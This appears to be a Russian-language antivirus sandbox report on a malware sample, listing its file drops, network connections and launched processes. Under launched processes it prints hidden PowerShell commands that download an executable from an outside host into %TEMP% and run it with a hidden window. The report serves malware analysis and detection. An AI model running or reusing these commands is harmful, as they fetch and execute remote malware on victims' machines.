Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bk338492.exe
Сетевая активность
Подключается к
- 'localhost':49695
- 'ke##uth.win':443
- '19#.#32.214.172':80
- 'x1.#.lencr.org':80
- 'e8.#.lencr.org':80
- 'vc###ibrary.uk':443
TCP
Запросы HTTP GET
- http://e8.#.lencr.org/41.crl
Другие
- 'localhost':49695
- 'localhost':49696
- 'e8.#.lencr.org':443
- 'vc###ibrary.uk':443
UDP
- DNS ASK ke##uth.win
- DNS ASK x1.#.lencr.org
- DNS ASK vc###ibrary.uk
- DNS ASK e8.#.lencr.org
Другое
Создает и запускает на исполнение
- '%TEMP%\bk338492.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=0o6u9MMc2QdKvqeHmgPRE008.txt' -OutFile $env:TEMP\BK338492.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=0o6u9MMc2QdKvqeHmgPRE008.txt' -OutFile $env:TEMP\BK338492.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\cmd.exe' /c certutil -hashfile "<Полный путь к файлу>" MD5 | find /i /v "md5" | find /i /v "certutil"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=0o6u9MMc2QdKvqeHmgPRE008.txt' -OutFile $env:TEMP\BK338492.exe; Start-Process -FilePath $env:TEMP\BK338492.exe...
- '<SYSTEM32>\certutil.exe' -hashfile "<Полный путь к файлу>" MD5
- '<SYSTEM32>\find.exe' /i /v "md5"
- '<SYSTEM32>\find.exe' /i /v "certutil"
- '%TEMP%\bk338492.exe' (со скрытым окном)
